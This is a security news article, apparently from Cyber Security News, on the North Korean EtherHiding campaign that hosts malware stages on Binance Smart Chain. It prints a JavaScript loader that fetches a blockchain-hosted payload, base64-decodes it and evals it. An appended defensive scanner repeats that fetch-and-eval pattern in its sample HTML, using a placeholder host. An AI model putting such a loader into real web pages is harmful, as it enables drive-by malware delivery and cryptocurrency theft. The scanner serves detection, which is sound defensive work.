
North Korean Hackers Using EtherHiding to Deliver Malware and Steal Cryptocurrency


In recent months, a sophisticated malware campaign, dubbed EtherHiding, has emerged from North Korea-aligned threat actors, sharply escalating the cybersecurity risks facing cryptocurrency exchanges and their users worldwide.

The campaign surfaced in the wake of heightened regulatory crackdowns on illicit crypto transactions, with attackers shifting tactics to exploit new digital supply chain vulnerabilities.

EtherHiding first appeared in targeted phishing campaigns, but has since evolved into a multi-stage threat, marked by its use of decentralized blockchain technologies to distribute and update malicious payloads stealthily.

The signature tactic distinguishing EtherHiding lies in its exploitation of the Binance Smart Chain (BSC) to host intermediary scripts, thereby circumventing traditional security controls and enabling the campaign to persist even after domains or hosting providers are taken down.

Attackers compromise legitimate or semi-legitimate websites, injecting code that reaches out to blockchain-stored content to fetch the latest stage of malware.

This modular approach grants the operators a high degree of agility, allowing on-the-fly updates to malicious scripts and reducing the effectiveness of traditional blocklists or take-down requests.

Google Cloud researchers identified and documented EtherHiding’s operation, highlighting its innovative use of cryptographic anonymity provided by blockchain networks, making forensic tracking and operational disruption significantly more challenging for defenders.

The impact of EtherHiding has been severe, enabling not only the theft of digital assets but also establishing persistent access to infected systems for further espionage or ransomware activity.

As the campaign evolved, it began to target browser extensions, hot wallets, and even popular DeFi platforms, broadening the spectrum of potential victims.

The campaign’s ability to iterate and redeploy new infection chains has frustrated enterprise defenders, with many legacy endpoint security solutions failing to keep pace with the dynamic delivery infrastructure leveraged by North Korean operators.

[Figure: UNC5342 EtherHiding on BNB Smart Chain and Ethereum (Source – Google Cloud)]

Cryptocurrency platforms are under renewed pressure to audit their web and cloud assets, as even a minor misconfiguration can open pathways for EtherHiding’s injection and subsequent exploitation.

Infection Mechanism and JavaScript Payloads

The infection chain typically begins with JavaScript injected into vulnerable web properties. This script silently loads additional code from the Binance Smart Chain using unique transaction identifiers.

The payload mechanism relies on obfuscation and multi-layer encoding, making static detection increasingly difficult.

For instance, base64-encoded loader scripts are fetched and then executed within the browser context, occasionally using iframes or manipulated event handlers to deliver the next stage payload.

A representative code snippet demonstrates the loader's logic:

// Loader as shown in the article; the RPC URL was cut off in the original
// and is replaced here with a labelled placeholder.
fetch('<BLOCKCHAIN_RPC_URL_ELIDED_IN_ORIGINAL>')
  .then(response => response.json())
  .then(data => {
    // The JSON "result" field carries the base64-encoded next stage,
    // which is decoded and executed directly in the page context.
    let scriptContent = atob(data.result);
    eval(scriptContent);
  });

Such tactics not only obscure the origin of the malicious payload but also enable rapid code updates.

As detection mechanisms adapt, EtherHiding operators push new payloads to the blockchain, decoupling the infection infrastructure from easy takedown and providing a resilient attack platform for ongoing theft and intrusion operations.
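The loader shape described above (a fetch whose JSON "result" is base64-decoded with atob and then handed to eval) is something a defender can hunt for in the HTML of their own web properties. The following is an added example, not code from the article or from Google Cloud: a small static scanner that pulls inline scripts out of a page and flags those combining remote fetch, base64 decoding and dynamic code execution. The RPC hostname fragments and the sample page are assumptions constructed for the demonstration, not indicators taken from the article.

```javascript
// Added example: static scan for EtherHiding-style loaders in inline scripts.
// RPC hint strings are assumptions; operators can switch endpoints at will.
const RPC_HOST_HINTS = ['bsc-dataseed', 'binance.org', 'eth_call', 'jsonrpc'];

// Extract the bodies of inline <script> tags from an HTML string.
function extractInlineScripts(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (m[1].trim().length > 0) out.push(m[1]);
  }
  return out;
}

// Return the list of loader indicators present in one script body.
function analyzeScript(src) {
  const hits = [];
  if (/\bfetch\s*\(/.test(src)) hits.push('fetch');
  if (/\.result\b/.test(src)) hits.push('json-result');
  if (/\batob\s*\(/.test(src)) hits.push('base64-decode');
  if (/\beval\s*\(|\bFunction\s*\(/.test(src)) hits.push('dynamic-exec');
  if (RPC_HOST_HINTS.some((h) => src.toLowerCase().includes(h))) hits.push('blockchain-rpc-hint');
  return hits;
}

// Flag scripts where fetch, base64 decode and dynamic execution co-occur;
// a blockchain RPC hint raises confidence but is not required for a hit.
function findEtherHidingLoaders(html) {
  const findings = [];
  const core = ['fetch', 'base64-decode', 'dynamic-exec'];
  extractInlineScripts(html).forEach((src, i) => {
    const hits = analyzeScript(src);
    if (core.every((c) => hits.includes(c))) {
      findings.push({ scriptIndex: i, indicators: hits, highConfidence: hits.includes('blockchain-rpc-hint') });
    }
  });
  return findings;
}

// Constructed sample page: one benign script and one loader-shaped script.
// The URL is a placeholder, not a real endpoint.
const SAMPLE_HTML = `<html><head><script>console.log("ok")</script></head>
<body><script>
fetch('https://bsc-dataseed.example/PLACEHOLDER').then(r => r.json())
  .then(d => { eval(atob(d.result)); });
</script></body></html>`;

console.log(JSON.stringify(findEtherHidingLoaders(SAMPLE_HTML)));
```

Run against a crawl of your own pages, a hit is a reason to diff the served HTML against the deployed source, since the injected script is what the campaign relies on to reach the blockchain-hosted stage.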

The post North Korean Hackers Using EtherHiding to Deliver Malware and Steal Cryptocurrency appeared first on Cyber Security News.

Source: cybersecuritynews.com
